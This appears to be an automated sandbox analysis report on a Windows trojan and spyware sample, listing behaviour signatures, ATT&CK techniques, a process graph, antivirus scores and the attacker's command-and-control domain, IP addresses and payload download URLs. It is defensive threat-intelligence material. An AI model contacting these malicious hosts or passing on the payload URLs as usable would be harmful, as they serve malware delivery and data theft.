                  Source: C:\Windows\SysWOW64\wscript.exeQueries volume information: C:\wql455oi0\ef2dsio342m1.zip VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeQueries volume information: C:\wql455oi0\ef2dsio342m1.zip VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeQueries volume information: C:\wql455oi0\ef2dsio342m1.zip VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeQueries volume information: C:\wql455oi0\ef2dsio3424.zip VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeQueries volume information: C:\wql455oi0\ef2dsio3424.zip VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeQueries volume information: C:\wql455oi0\ef2dsio3424.zip VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeQueries volume information: C:\wql455oi0\ef2dsio3424.zip VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeQueries volume information: C:\wql455oi0\ef2dsio3424.zip VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeQueries volume information: C:\wql455oi0\ef2dsio342a3.zip VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeQueries volume information: C:\wql455oi0\ef2dsio342a3.zip VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeQueries volume information: C:\wql455oi0\ef2dsio342a3.zip VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeQueries volume information: C:\wql455oi0\ef2dsio342a3.zip VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeQueries volume information: C:\wql455oi0\ef2dsio342a3.zip VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGuYmJNS1K.exeCode function: 0_2_00FE1D35 cpuid 0_2_00FE1D35
                  Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: C:\Users\user\Desktop\dGuYmJNS1K.exeCode function: 0_2_00FE1975 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00FE1975
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D4BF0F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,12_2_00D4BF0F
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D6E5F8 GetUserNameW,12_2_00D6E5F8
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D15D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,12_2_00D15D78

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 13.2.attrib.exe.81bcfc.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.ef2dsio342ai.exe.40c211c.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.attrib.exe.7b9efc.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.ef2dsio342ai.exe.406031c.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.attrib.exe.81bcfc.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.ef2dsio342ai.exe.406031c.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.ef2dsio342ai.exe.40c211c.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.attrib.exe.7b9efc.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.attrib.exe.400000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000D.00000002.2910031711.0000000000773000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.1930692252.0000000004013000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: ef2dsio342ai.exe PID: 7236, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: attrib.exe PID: 7256, type: MEMORYSTR
                  Source: Yara matchFile source: 13.2.attrib.exe.7b9efc.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.ef2dsio342ai.exe.406031c.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.ef2dsio342ai.exe.406031c.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.attrib.exe.7b9efc.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.attrib.exe.400000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000D.00000002.2910031711.0000000000773000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.1930692252.0000000004013000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: ef2dsio342ai.exe PID: 7236, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: attrib.exe PID: 7256, type: MEMORYSTR
                  Source: ef2dsio342ai.exeBinary or memory string: WIN_81
                  Source: ef2dsio342ai.exe, 0000000C.00000003.1926852142.00000000013AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_XP
                  Source: lp1a3.8.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                  Source: ef2dsio342ai.exeBinary or memory string: WIN_XPe
                  Source: ef2dsio342ai.exeBinary or memory string: WIN_VISTA
                  Source: ef2dsio342ai.exeBinary or memory string: WIN_7
                  Source: ef2dsio342ai.exeBinary or memory string: WIN_8
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D92163 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,12_2_00D92163
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D91B61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,12_2_00D91B61
                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  2
                  Valid Accounts
                  2
                  Windows Management Instrumentation
                  1
                  DLL Side-Loading
                  1
                  Exploitation for Privilege Escalation
                  1
                  Disable or Modify Tools
                  21
                  Input Capture
                  2
                  System Time Discovery
                  Remote Services1
                  Archive Collected Data
                  Exfiltration Over Other Network Medium2
                  Ingress Tool Transfer
                  Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                  System Shutdown/Reboot
                  Default Accounts111
                  Scripting
                  2
                  Valid Accounts
                  1
                  DLL Side-Loading
                  11
                  Deobfuscate/Decode Files or Information
                  LSASS Memory1
                  Account Discovery
                  Remote Desktop Protocol21
                  Input Capture
                  Exfiltration Over Bluetooth11
                  Encrypted Channel
                  Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain Accounts1
                  Native API
                  Logon Script (Windows)2
                  Valid Accounts
                  111
                  Scripting
                  Security Account Manager2
                  File and Directory Discovery
                  SMB/Windows Admin Shares12
                  Clipboard Data
                  Automated Exfiltration2
                  Non-Application Layer Protocol
                  Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local Accounts113
                  Command and Scripting Interpreter
                  Logon Script (Mac)21
                  Access Token Manipulation
                  2
                  Obfuscated Files or Information
                  NTDS57
                  System Information Discovery
                  Distributed Component Object ModelInput CaptureScheduled Transfer13
                  Application Layer Protocol
                  SIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon Script412
                  Process Injection
                  1
                  DLL Side-Loading
                  LSA Secrets241
                  Security Software Discovery
                  SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.common11
                  Masquerading
                  Cached Domain Credentials11
                  Virtualization/Sandbox Evasion
                  VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup Items2
                  Valid Accounts
                  DCSync2
                  Process Discovery
                  Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                  Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job11
                  Virtualization/Sandbox Evasion
                  Proc Filesystem1
                  Application Window Discovery
                  Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                  Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)21
                  Access Token Manipulation
                  /etc/passwd and /etc/shadow1
                  System Owner/User Discovery
                  Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                  Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)412
                  Process Injection
                  Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1330994 Sample: dGuYmJNS1K.exe Startdate: 24/10/2023 Architecture: WINDOWS Score: 100 39 m4gx.dns04.com 2->39 43 Malicious sample detected (through community Yara rule) 2->43 45 Multi AV Scanner detection for dropped file 2->45 47 Multi AV Scanner detection for submitted file 2->47 49 2 other signatures 2->49 11 dGuYmJNS1K.exe 2->11         started        signatures3 process4 signatures5 53 Obfuscated command line found 11->53 14 cmd.exe 1 11->14         started        process6 process7 16 cmd.exe 3 2 14->16         started        18 cmd.exe 2 14->18         started        22 conhost.exe 14->22         started        24 3 other processes 14->24 file8 26 wscript.exe 2 32 16->26         started        35 C:\Users\Public\bjk6l9.vbs, ASCII 18->35 dropped 51 Command shell drops VBS files 18->51 signatures9 process10 dnsIp11 41 m4gx.dns04.com 206.71.149.162, 443, 49737, 49738 NTT-COMMUNICATIONS-2914US United States 26->41 37 C:\wql455oi0\lp1a3, PE32 26->37 dropped 30 ef2dsio342ai.exe 26->30         started        file12 process13 signatures14 55 Found API chain indicative of sandbox detection 30->55 57 Contains functionality to inject code into remote processes 30->57 59 Writes to foreign memory regions 30->59 61 3 other signatures 30->61 33 attrib.exe 30->33         started        process15

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  dGuYmJNS1K.exe21%ReversingLabsWin32.Trojan.Generic
                  dGuYmJNS1K.exe31%VirustotalBrowse
                  SourceDetectionScannerLabelLink
                  C:\wql455oi0\lp1a39%ReversingLabs
                  C:\wql455oi0\lp1a310%VirustotalBrowse
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  http://193.149.176.210/filept/0%Avira URL Cloudsafe
                  http://www.geoplugin.net/php.gp0%Avira URL Cloudsafe
                  http://206.71.149.162/U0%Avira URL Cloudsafe
                  http://206.71.149.162/U1%VirustotalBrowse
                  http://193.149.176.210/filept/1%VirustotalBrowse
                  http://iptc.org/std/Iptc4xmpExt/2008-02-29/0%VirustotalBrowse
                  http://www.geoplugin.net/php.gp0%VirustotalBrowse
                  http://ns.useplus.org/ldf/xmp/1.0/1%VirustotalBrowse
                  http://ns.useplus.org/ldf/xmp/1.0/0%Avira URL Cloudsafe
                  http://iptc.org/std/Iptc4xmpExt/2008-02-29/0%Avira URL Cloudsafe
                  http://www.indyproject.org/0%Avira URL Cloudsafe
                  http://206.71.149.162/0%Avira URL Cloudsafe
                  http://193.149.176.210/filept/S0%Avira URL Cloudsafe
                  http://www.indyproject.org/1%VirustotalBrowse
                  http://206.71.149.162/d2.x0%Avira URL Cloudsafe
                  http://206.71.149.162/d1.x0%Avira URL Cloudsafe
                  http://206.71.149.162/1%VirustotalBrowse
                  http://193.149.176.210/filept/S1%VirustotalBrowse
                  http://206.71.149.162/d2.x1%VirustotalBrowse
                  http://206.71.149.162/d1.x1%VirustotalBrowse
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  m4gx.dns04.com
                  206.71.149.162
                  truefalse
                    high
                    NameMaliciousAntivirus DetectionReputation
                    https://m4gx.dns04.com/g1/false
                      high
                      https://m4gx.dns04.com/v/lp1382.dfhyhgffalse
                        high
                        https://m4gx.dns04.com/lp1aa3.dfhyhgffalse
                          high
                          https://m4gx.dns04.com/lp1a.phpfalse
                            high
                            https://m4gx.dns04.com/lp1am1.dfhyhgffalse
                              high
                              https://m4gx.dns04.com//g1false
                                high
                                NameSourceMaliciousAntivirus DetectionReputation
                                http://www.autoitscript.com/autoit3/Jef2dsio342ai.exe, 0000000C.00000000.1875829113.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmp, lp1a3.8.drfalse
                                  high
                                  http://ns.useplus.org/ldf/xmp/1.0/attrib.exe, 0000000D.00000002.2913462896.0000000006DE7000.00000004.00001000.00020000.00000000.sdmp, attrib.exe, 0000000D.00000002.2913462896.0000000006E69000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • 1%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://206.71.149.162/Uef2dsio342ai.exe, 0000000C.00000002.1930692252.0000000003CCA000.00000004.00000020.00020000.00000000.sdmp, attrib.exe, 0000000D.00000002.2910031711.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                  • 1%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://m4gx.dns04.com/v/lp1382.dfhyhgfEwscript.exe, 00000008.00000003.1738155988.0000000005FF1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1738724139.0000000005FF1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1738217818.0000000005FF1000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    http://www.geoplugin.net/php.gpef2dsio342ai.exe, 0000000C.00000002.1930692252.0000000003CCA000.00000004.00000020.00020000.00000000.sdmp, attrib.exe, attrib.exe, 0000000D.00000002.2910031711.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                    • 0%, Virustotal, Browse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://iptc.org/std/Iptc4xmpExt/2008-02-29/attrib.exe, 0000000D.00000002.2913462896.0000000006DE7000.00000004.00001000.00020000.00000000.sdmp, attrib.exe, 0000000D.00000002.2913462896.0000000006E69000.00000004.00001000.00020000.00000000.sdmpfalse
                                    • 0%, Virustotal, Browse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://m4gx.dns04.com/g1/3wscript.exe, 00000008.00000003.1674016827.0000000003491000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1673911576.0000000003491000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://m4gx.dns04.com/v/lp1382.dfhyhgfSwscript.exe, 00000008.00000003.1738155988.0000000005FF1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1738724139.0000000005FF1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1738217818.0000000005FF1000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        http://www.gimp.org/xmp/attrib.exe, 0000000D.00000002.2913462896.0000000006E65000.00000004.00001000.00020000.00000000.sdmp, attrib.exe, 0000000D.00000002.2913462896.0000000006DE7000.00000004.00001000.00020000.00000000.sdmp, attrib.exe, 0000000D.00000002.2913462896.0000000006E69000.00000004.00001000.00020000.00000000.sdmp, attrib.exe, 0000000D.00000002.2913462896.0000000006E80000.00000004.00001000.00020000.00000000.sdmpfalse
                                          high
                                          http://193.149.176.210/filept/ef2dsio342ai.exe, 0000000C.00000002.1930692252.0000000003CCA000.00000004.00000020.00020000.00000000.sdmp, attrib.exe, attrib.exe, 0000000D.00000002.2910031711.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                          • 1%, Virustotal, Browse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.indyproject.org/ef2dsio342ai.exe, 0000000C.00000002.1930692252.0000000003CCA000.00000004.00000020.00020000.00000000.sdmp, attrib.exe, attrib.exe, 0000000D.00000002.2911814872.0000000005002000.00000004.00001000.00020000.00000000.sdmp, attrib.exe, 0000000D.00000002.2910031711.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                          • 1%, Virustotal, Browse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://m4gx.dns04.com//g1cwscript.exe, 00000008.00000003.1674016827.0000000003491000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1673911576.0000000003491000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://www.autoitscript.com/autoit3/lp1a3.8.drfalse
                                              high
                                              http://193.149.176.210/filept/Sef2dsio342ai.exe, 0000000C.00000002.1930692252.0000000003CCA000.00000004.00000020.00020000.00000000.sdmp, attrib.exe, 0000000D.00000002.2910031711.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                              • 1%, Virustotal, Browse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://206.71.149.162/attrib.exe, 0000000D.00000002.2910031711.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                              • 1%, Virustotal, Browse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://206.71.149.162/d2.xef2dsio342ai.exe, 0000000C.00000002.1930692252.0000000003CCA000.00000004.00000020.00020000.00000000.sdmp, attrib.exe, attrib.exe, 0000000D.00000002.2910031711.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                              • 1%, Virustotal, Browse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://206.71.149.162/d1.xef2dsio342ai.exe, 0000000C.00000002.1930692252.0000000003CCA000.00000004.00000020.00020000.00000000.sdmp, attrib.exe, attrib.exe, 0000000D.00000002.2910031711.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                              • 1%, Virustotal, Browse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://m4gx.dns04.com/g1/Swscript.exe, 00000008.00000003.1674016827.0000000003491000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1673911576.0000000003491000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://m4gx.dns04.com/v/lp1382.dfhyhgf-wscript.exe, 00000008.00000003.1738235445.00000000074BC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1738742128.00000000074BC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://m4gx.dns04.com/v/lp1382.dfhyhgf9-A2D8-08002B30309Dwscript.exe, 00000008.00000003.1738235445.00000000074AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://m4gx.dns04.com/g1/kwscript.exe, 00000008.00000003.1674016827.0000000003491000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1673911576.0000000003491000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://www.nirsoft.net/attrib.exe, 0000000D.00000002.2910031711.0000000000773000.00000040.00000400.00020000.00000000.sdmpfalse
                                                        high
                                                        https://m4gx.dns04.com//g1Lwscript.exe, 00000008.00000003.1674016827.0000000003491000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1673911576.0000000003491000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://m4gx.dns04.com//g1Kwscript.exe, 00000008.00000003.1674016827.0000000003491000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1673911576.0000000003491000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs
                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            206.71.149.162
                                                            m4gx.dns04.comUnited States
                                                            2914NTT-COMMUNICATIONS-2914USfalse
                                                            Joe Sandbox Version:38.0.0 Ammolite
                                                            Analysis ID:1330994
                                                            Start date and time:2023-10-24 06:54:27 +02:00
                                                            Joe Sandbox Product:CloudBasic
                                                            Overall analysis duration:0h 7m 24s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Number of analysed new started processes analysed:17
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample file name:dGuYmJNS1K.exe
                                                            renamed because original name is a hash value
                                                            Original Sample Name:897af5616bfd6af5b687876924f39ee3.exe
                                                            Detection:MAL
                                                            Classification:mal100.troj.spyw.evad.winEXE@21/19@1/1
                                                            EGA Information:
                                                            • Successful, ratio: 100%
                                                            HCA Information:
                                                            • Successful, ratio: 66%
                                                            • Number of executed functions: 69
                                                            • Number of non-executed functions: 321
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .exe
                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe
                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                            • Report size getting too big, too many NtEnumerateKey calls found.
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                            TimeTypeDescription
                                                            06:55:41API Interceptor2x Sleep call for process: attrib.exe modified
                                                            No context
                                                            No context
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            NTT-COMMUNICATIONS-2914USluO0gwRNZ1.elfGet hashmaliciousMiraiBrowse
                                                            • 207.198.205.66
                                                            sora.arm.elfGet hashmaliciousMiraiBrowse
                                                            • 157.239.24.95
                                                            Aqua.arm4.elfGet hashmaliciousMiraiBrowse
                                                            • 153.254.219.36
                                                            yj2ylhOgCf.elfGet hashmaliciousMiraiBrowse
                                                            • 157.239.24.93
                                                            COu9m1VCOS.elfGet hashmaliciousMiraiBrowse
                                                            • 206.184.241.10
                                                            x607DB0i08.exeGet hashmaliciousPushdoBrowse
                                                            • 61.200.81.21
                                                            dJSj2IVICF.elfGet hashmaliciousMiraiBrowse
                                                            • 207.56.41.84
                                                            s5na7es7Nl.elfGet hashmaliciousMiraiBrowse
                                                            • 157.239.48.31
                                                            sora.arm.elfGet hashmaliciousMiraiBrowse
                                                            • 117.103.186.91
                                                            3FKykOcbPa.elfGet hashmaliciousMiraiBrowse
                                                            • 204.205.85.195
                                                            m7Nwerq4Mz.elfGet hashmaliciousMiraiBrowse
                                                            • 207.196.39.255
                                                            z3Rtr1rtKU.elfGet hashmaliciousMiraiBrowse
                                                            • 204.142.152.163
                                                            sora.arm.elfGet hashmaliciousMiraiBrowse
                                                            • 198.139.216.249
                                                            UMCoq0Wh5J.elfGet hashmaliciousMiraiBrowse
                                                            • 206.239.166.151
                                                            ZfTI7n11nz.elfGet hashmaliciousMiraiBrowse
                                                            • 128.241.48.149
                                                            LbHvaqdfCq.elfGet hashmaliciousMiraiBrowse
                                                            • 216.42.117.107
                                                            nRb3yCgaki.elfGet hashmaliciousUnknownBrowse
                                                            • 204.247.14.224
                                                            LqNhg5Rbth.elfGet hashmaliciousMiraiBrowse
                                                            • 209.94.28.79
                                                            Bw95SjFynD.elfGet hashmaliciousUnknownBrowse
                                                            • 204.1.20.83
                                                            50jB4PNNYw.elfGet hashmaliciousMiraiBrowse
                                                            • 206.163.93.201
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            37f463bf4616ecd445d4a1937da06e192d8a93ed-0e7f-42eb-9baa-63d58290d598_Update.jsGet hashmaliciousUnknownBrowse
                                                            • 206.71.149.162
                                                            Myrosin.exeGet hashmaliciousGuLoaderBrowse
                                                            • 206.71.149.162
                                                            Draft_BL,_CI_&_PL.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                            • 206.71.149.162
                                                            pligtig.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                            • 206.71.149.162
                                                            PT90490 Solicitud oferta DISELECTRIC SIEMENS 10_23_2023.vbsGet hashmaliciousGuLoaderBrowse
                                                            • 206.71.149.162
                                                            file.exeGet hashmaliciousPrivateLoaderBrowse
                                                            • 206.71.149.162
                                                            PT90490_Solicitud_oferta_DISELECTRIC_SIEMENS_10_23_2023.vbsGet hashmaliciousGuLoaderBrowse
                                                            • 206.71.149.162
                                                            BTKscemF70.msiGet hashmaliciousUnknownBrowse
                                                            • 206.71.149.162
                                                            BTKscemF70.msiGet hashmaliciousUnknownBrowse
                                                            • 206.71.149.162
                                                            FTA-Corporate Tax informations.exeGet hashmaliciousGuLoaderBrowse
                                                            • 206.71.149.162
                                                            SecuriteInfo.com.Win32.Trojan.Kryptik.HK@susp.11565.26013.exeGet hashmaliciousUnknownBrowse
                                                            • 206.71.149.162
                                                            SecuriteInfo.com.Win32.Evo-gen.14327.7089.exeGet hashmaliciousGuLoaderBrowse
                                                            • 206.71.149.162
                                                            file.exeGet hashmaliciousUnknownBrowse
                                                            • 206.71.149.162
                                                            Quotation_Request_(ISGB)_7788EU_-_1020ITA#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                                                            • 206.71.149.162
                                                            MT103.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                            • 206.71.149.162
                                                            doc_253554_2023.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                            • 206.71.149.162
                                                            Aviso_de_Pago_Banco_BCP_Pdf.jsGet hashmaliciousAgentTeslaBrowse
                                                            • 206.71.149.162
                                                            310235118213_0365013261_20231017.vbsGet hashmaliciousNanoCore, GuLoaderBrowse
                                                            • 206.71.149.162
                                                            310235118213_0365013261_20231018.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                            • 206.71.149.162
